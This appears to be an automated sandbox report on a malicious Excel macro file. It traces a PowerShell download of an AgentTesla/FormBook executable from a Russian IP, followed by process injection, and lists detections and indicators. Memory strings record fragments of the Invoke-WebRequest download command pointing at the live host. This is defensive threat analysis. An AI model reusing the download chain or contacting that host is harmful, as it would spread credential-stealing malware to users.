            Source: Yara matchFile source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_10007A00 RpcStringBindingComposeA,RpcBindingFromStringBindingA,RpcStringFreeA,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_10007A90 RpcBindingFree,

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting1Path InterceptionExtra Window Memory Injection1Deobfuscate/Decode Files or Information1Input Capture1Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Scripting1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution12Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSystem Information Discovery114SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSecurity Software Discovery241Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
            Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion31DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection512Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 510341 Sample: purchase Order.xlsm Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 11 other signatures 2->69 11 explorer.exe 2->11         started        13 EXCEL.EXE 25 22 2->13         started        process3 file4 16 eVJOpc.exe 17 11->16         started        43 C:\Users\user\Desktop\~$purchase Order.xlsm, data 13->43 dropped 45 C:\Users\user\...\purchase Order.xlsm (copy), Microsoft 13->45 dropped 20 powershell.exe 15 18 13->20         started        process5 dnsIp6 39 C:\Users\user\AppData\...\qqxmvpxcvyt.dll, PE32 16->39 dropped 51 Antivirus detection for dropped file 16->51 53 Multi AV Scanner detection for dropped file 16->53 55 Machine Learning detection for dropped file 16->55 61 2 other signatures 16->61 23 eVJOpc.exe 16->23         started        47 212.192.241.75, 49746, 80 RAPMSB-ASRU Russian Federation 20->47 41 C:\Users\Public\eVJOpc.exe, PE32 20->41 dropped 57 Drops PE files to the user root directory 20->57 59 Powershell drops PE file 20->59 26 explorer.exe 1 20->26         started        28 conhost.exe 20->28         started        file7 signatures8 process9 signatures10 71 Modifies the context of a thread in another process (thread injection) 23->71 73 Maps a DLL or memory area into another process 23->73 75 Sample uses process hollowing technique 23->75 77 Queues an APC in another process (thread injection) 23->77 30 explorer.exe 23->30 injected process11 process12 32 wlanext.exe 30->32         started        signatures13 49 Tries to detect virtualization through RDTSC time measurements 32->49 35 cmd.exe 1 32->35         started        process14 process15 37 conhost.exe 35->37         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            purchase Order.xlsm22%VirustotalBrowse
            purchase Order.xlsm41%ReversingLabsScript.Downloader.EncDoc
            purchase Order.xlsm100%AviraW2000M/YAV.Minerva.ssocv

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll100%AviraTR/Tesla.ivvdd
            C:\Users\Public\eVJOpc.exe100%AviraTR/Tesla.amqdv
            C:\Users\Public\eVJOpc.exe100%Joe Sandbox ML
            C:\Users\Public\eVJOpc.exe50%ReversingLabsWin32.Trojan.AgentTesla
            C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll38%ReversingLabsWin32.Trojan.AgentTesla

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            8.2.eVJOpc.exe.f040000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            9.2.eVJOpc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            9.1.eVJOpc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            9.0.eVJOpc.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
            19.2.wlanext.exe.2e7de48.1.unpack100%AviraTR/Patched.Ren.GenDownload File
            9.0.eVJOpc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            9.0.eVJOpc.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
            9.0.eVJOpc.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            8.0.eVJOpc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
            9.0.eVJOpc.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
            9.0.eVJOpc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            8.2.eVJOpc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
            9.0.eVJOpc.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://roaming.edog.0%URL Reputationsafe
            https://cdn.entity.0%URL Reputationsafe
            https://powerlift.acompli.net0%URL Reputationsafe
            https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
            https://cortana.ai0%URL Reputationsafe
            https://api.aadrm.com/0%URL Reputationsafe
            https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
            http://212.192.241.75/sam/new3.exenvoke-WebRequest0%Avira URL Cloudsafe
            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
            https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
            https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
            https://officeci.azurewebsites.net/api/0%URL Reputationsafe
            https://store.office.cn/addinstemplate0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://212.192.241.75/sam/new3.exe-OutFile$env:public0%Avira URL Cloudsafe
            https://api.aadrm.com0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
            https://www.odwebp.svc.ms0%URL Reputationsafe
            https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
            https://dataservice.o365filtering.com/0%URL Reputationsafe
            https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
            https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
            https://ncus.contentsync.0%URL Reputationsafe
            https://apis.live.net/v5.0/0%URL Reputationsafe
            https://wus2.contentsync.0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
            http://212.192.241.75/sam/new3.exe12%VirustotalBrowse
            http://212.192.241.75/sam/new3.exe0%Avira URL Cloudsafe
            www.art-for-a-cause.com/m5cw/100%Avira URL Cloudmalware
            https://go.micros0%Avira URL Cloudsafe
            https://contoso.com/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://212.192.241.75/sam/new3.exetrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            www.art-for-a-cause.com/m5cw/true
            • Avira URL Cloud: malware
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://api.diagnosticssdf.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
              		high
              https://login.microsoftonline.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                		high
                https://shell.suite.office.com:144388AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                  		high
                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                    		high
                    https://autodiscover-s.outlook.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                      		high
                      https://roaming.edog.88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                        		high
                        https://cdn.entity.88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.addins.omex.office.net/appinfo/query88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                          		high
                          https://clients.config.office.net/user/v1.0/tenantassociationkey88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                            		high
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                              		high
                              https://powerlift.acompli.net88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://rpsticket.partnerservices.getmicrosoftkey.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v188AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                		high
                                https://cortana.ai88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                  		high
                                  https://cloudfiles.onenote.com/upload.aspx88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                    		high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                      		high
                                      https://entitlement.diagnosticssdf.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                        		high
                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                          		high
                                          https://api.aadrm.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ofcrecsvcapi-int.azurewebsites.net/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://212.192.241.75/sam/new3.exenvoke-WebRequestpowershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                            		high
                                            https://api.microsoftstream.com/api/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                              		high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                		high
                                                https://cr.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://portal.office.com/account/?ref=ClientMeControl88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.357492979.00000000049D1000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://graph.ppe.windows.net88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                          		high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://powerlift-frontdesk.acompli.net88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://tasks.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                            		high
                                                            https://officeci.azurewebsites.net/api/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                              		high
                                                              https://store.office.cn/addinstemplate88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://212.192.241.75/sam/new3.exe-OutFile$env:publicpowershell.exe, 00000001.00000002.355847421.0000000002B50000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.356485936.0000000002C48000.00000004.00000020.sdmp, powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.355784668.0000000002B40000.00000004.00000040.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://api.aadrm.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://go.micropowershell.exe, 00000001.00000002.358997121.0000000004DD2000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                  		high
                                                                  https://globaldisco.crm.dynamics.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                    		high
                                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                      		high
                                                                      https://dev0-api.acompli.net/autodetect88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.odwebp.svc.ms88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groups88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                        		high
                                                                        https://web.microsoftstream.com/video/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                          		high
                                                                          http://nsis.sf.net/NSIS_ErrorErroreVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.drfalse
                                                                            		high
                                                                            https://api.addins.store.officeppe.com/addinstemplate88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://graph.windows.net88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                              		high
                                                                              https://dataservice.o365filtering.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://officesetup.getmicrosoftkey.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://analysis.windows.net/powerbi/api88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                  		high
                                                                                  https://prod-global-autodetect.acompli.net/autodetect88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                    		high
                                                                                    http://nsis.sf.net/NSIS_ErroreVJOpc.exe, eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.drfalse
                                                                                      		high
                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                        		high
                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                          		high
                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                            		high
                                                                                            https://ncus.contentsync.88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                              		high
                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                		high
                                                                                                http://weather.service.msn.com/data.aspx88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                  		high
                                                                                                  https://apis.live.net/v5.0/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                    		high
                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                      		high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                        		high
                                                                                                        https://management.azure.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                            		high
                                                                                                            https://wus2.contentsync.88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://incidents.diagnostics.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                              		high
                                                                                                              https://clients.config.office.net/user/v1.0/ios88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                		high
                                                                                                                https://insertmedia.bing.office.net/odc/insertmedia88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                  		high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                    		high
                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://outlook.office365.com/api/v1.0/me/Activities88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                      		high
                                                                                                                      https://api.office.net88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                        		high
                                                                                                                        https://incidents.diagnosticssdf.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                          		high
                                                                                                                          https://asgsmsproxyapi.azurewebsites.net/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policies88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                            		high
                                                                                                                            https://entitlement.diagnostics.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                              		high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                		high
                                                                                                                                https://substrate.office.com/search/api/v2/init88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocation88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://outlook.office365.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://webshell.suite.office.com88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://substrate.office.com/search/api/v1/SearchHistory88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://go.microspowershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://contoso.com/powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://management.azure.com/88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorize88AF1BA5-4E6A-4278-A045-D7218995DD99.0.drfalse
                                                                                                                                                  		high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  212.192.241.75
                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                  		61269RAPMSB-ASRUtrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:510341
                                                                                                                                                  Start date:27.10.2021
                                                                                                                                                  Start time:18:14:40
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 39s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:purchase Order.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:24
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSM@15/13@0/1
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 31.4% (good quality ratio 27.9%)
